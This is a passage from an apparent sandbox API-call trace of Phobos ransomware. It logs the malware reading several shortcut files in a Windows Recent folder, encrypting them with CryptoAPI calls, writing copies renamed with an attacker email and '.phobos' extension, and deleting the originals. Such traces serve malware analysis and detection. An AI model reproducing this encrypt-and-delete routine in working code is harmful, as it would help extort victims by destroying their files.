pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa329a8) returned 1 [0199.843] CryptSetKeyParam (hKey=0xa329a8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0199.843] CryptEncrypt (in: hKey=0xa329a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0199.843] CryptDestroyKey (hKey=0xa329a8) returned 1 [0199.843] WriteFile (in: hFile=0x170, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0199.843] CryptDestroyKey (hKey=0xa32868) returned 1 [0199.843] CloseHandle (hObject=0x120) returned 1 [0199.843] CloseHandle (hObject=0x170) returned 1 [0199.844] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\6c2UZa.mkv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\6c2uza.mkv.lnk")) returned 1 [0199.845] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0199.845] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\6ci0JU2A.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\6ci0ju2a.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0199.847] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1000) returned 1 [0199.847] CloseHandle (hObject=0x170) returned 1 [0199.847] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\6ci0JU2A.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\6ci0ju2a.lnk")) returned 0x20 [0199.847] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\6ci0JU2A.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\6ci0ju2a.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.847] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\6ci0JU2A.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\6ci0ju2a.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0199.847] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0199.847] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0199.847] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\6ci0JU2A.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\6ci0ju2a.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x120 [0199.848] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32868) returned 1 [0199.848] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0199.848] ReadFile (in: hFile=0x170, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x3e8, lpOverlapped=0x0) returned 1 [0199.849] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x3f0, dwBufLen=0x3f0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x3f0) returned 1 [0199.849] WriteFile (in: hFile=0x120, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x3f0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x3f0, lpOverlapped=0x0) returned 1 [0199.850] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa329a8) returned 1 [0199.850] CryptSetKeyParam (hKey=0xa329a8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0199.850] CryptEncrypt (in: hKey=0xa329a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0199.850] CryptDestroyKey (hKey=0xa329a8) returned 1 [0199.850] WriteFile (in: hFile=0x120, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0199.851] CryptDestroyKey (hKey=0xa32868) returned 1 [0199.851] CloseHandle (hObject=0x170) returned 1 [0199.851] CloseHandle (hObject=0x120) returned 1 [0199.851] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\6ci0JU2A.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\6ci0ju2a.lnk")) returned 1 [0199.852] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0199.852] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\6O7-m LH.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\6o7-m lh.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x120 [0199.853] GetFileSizeEx (in: hFile=0x120, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=2565) returned 1 [0199.853] CloseHandle (hObject=0x120) returned 1 [0199.854] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\6O7-m LH.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\6o7-m lh.lnk")) returned 0x20 [0199.854] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\6O7-m LH.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\6o7-m lh.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.854] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\6O7-m LH.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\6o7-m lh.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x120 [0199.854] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0199.854] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0199.854] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\6O7-m LH.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\6o7-m lh.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0199.855] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32868) returned 1 [0199.855] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0199.855] ReadFile (in: hFile=0x120, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0xa05, lpOverlapped=0x0) returned 1 [0199.998] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xa10, dwBufLen=0xa10 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xa10) returned 1 [0199.999] WriteFile (in: hFile=0x170, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xa10, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xa10, lpOverlapped=0x0) returned 1 [0200.000] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32ce8) returned 1 [0200.000] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0200.000] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0200.000] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0200.000] WriteFile (in: hFile=0x170, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0200.000] CryptDestroyKey (hKey=0xa32868) returned 1 [0200.000] CloseHandle (hObject=0x120) returned 1 [0200.000] CloseHandle (hObject=0x170) returned 1 [0200.000] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\6O7-m LH.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\6o7-m lh.lnk")) returned 1 [0200.002] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0200.002] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\9deII5P0-trYkA_97dJ.flv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\9deii5p0-tryka_97dj.flv.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0200.003] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=624) returned 1 [0200.003] CloseHandle (hObject=0x170) returned 1 [0200.003] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\9deII5P0-trYkA_97dJ.flv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\9deii5p0-tryka_97dj.flv.lnk")) returned 0x20 [0200.003] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\9deII5P0-trYkA_97dJ.flv.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\9deii5p0-tryka_97dj.flv.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.003] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\9deII5P0-trYkA_97dJ.flv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\9deii5p0-tryka_97dj.flv.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0200.003] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0200.003] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0200.003] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\9deII5P0-trYkA_97dJ.flv.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\9deii5p0-tryka_97dj.flv.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x120 [0200.004] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32868) returned 1 [0200.004] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0200.004] ReadFile (in: hFile=0x170, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x270, lpOverlapped=0x0) returned 1 [0200.006] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x280, dwBufLen=0x280 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x280) returned 1 [0200.006] WriteFile (in: hFile=0x120, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x280, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x280, lpOverlapped=0x0) returned 1 [0200.007] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32ce8) returned 1 [0200.007] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0200.007] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60, dwBufLen=0x60 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60) returned 1 [0200.007] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0200.007] WriteFile (in: hFile=0x120, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x112, lpOverlapped=0x0) returned 1 [0200.007] CryptDestroyKey (hKey=0xa32868) returned 1 [0200.007] CloseHandle (hObject=0x170) returned 1 [0200.007] CloseHandle (hObject=0x120) returned 1 [0200.008] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\9deII5P0-trYkA_97dJ.flv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\9deii5p0-tryka_97dj.flv.lnk")) returned 1 [0200.009] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0200.009] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\9p1v7bjt7T1RE5.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\9p1v7bjt7t1re5.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x120 [0200.010] GetFileSizeEx (in: hFile=0x120, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=6854) returned 1 [0200.010] CloseHandle (hObject=0x120) returned 1 [0200.010] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\9p1v7bjt7T1RE5.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\9p1v7bjt7t1re5.lnk")) returned 0x20 [0200.010] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\9p1v7bjt7T1RE5.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\9p1v7bjt7t1re5.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.010] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\9p1v7bjt7T1RE5.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\9p1v7bjt7t1re5.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x120 [0200.011] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0200.011] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0200.011] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\9p1v7bjt7T1RE5.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\9p1v7bjt7t1re5.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0200.012] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32868) returned 1 [0200.012] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0200.012] ReadFile (in: hFile=0x120, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x1ac6, lpOverlapped=0x0) returned 1 [0200.015] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1ad0, dwBufLen=0x1ad0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1ad0) returned 1 [0200.015] WriteFile (in: hFile=0x170, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x1ad0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x1ad0, lpOverlapped=0x0) returned 1 [0200.016] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32828) returned 1 [0200.016] CryptSetKeyParam (hKey=0xa32828, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0200.017] CryptEncrypt (in: hKey=0xa32828, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0200.017] CryptDestroyKey (hKey=0xa32828) returned 1 [0200.017] WriteFile (in: hFile=0x170, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0200.017] CryptDestroyKey (hKey=0xa32868) returned 1 [0200.017] CloseHandle (hObject=0x120) returned 1 [0200.017] CloseHandle (hObject=0x170) returned 1 [0200.017] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\9p1v7bjt7T1RE5.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\9p1v7bjt7t1re5.lnk")) returned 1 [0200.018] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0200.018] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\a0ufU.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\a0ufu.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0200.019] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=3823) returned 1 [0200.019] CloseHandle (hObject=0x170) returned 1 [0200.019] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\a0ufU.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\a0ufu.lnk")) returned 0x20 [0200.019] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\a0ufU.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\a0ufu.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.019] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\a0ufU.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\a0ufu.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0200.019] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0200.019] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0200.019] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\a0ufU.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\a0ufu.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x120 [0200.020] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32868) returned 1 [0200.020] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0200.020] ReadFile (in: hFile=0x170, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0xeef, lpOverlapped=0x0) returned 1 [0200.022] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xef0, dwBufLen=0xef0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xef0) returned 1 [0200.022] WriteFile (in: hFile=0x120, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xef0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xef0, lpOverlapped=0x0) returned 1 [0200.023] CryptImportKey (in: hProv=0xa24cf8, 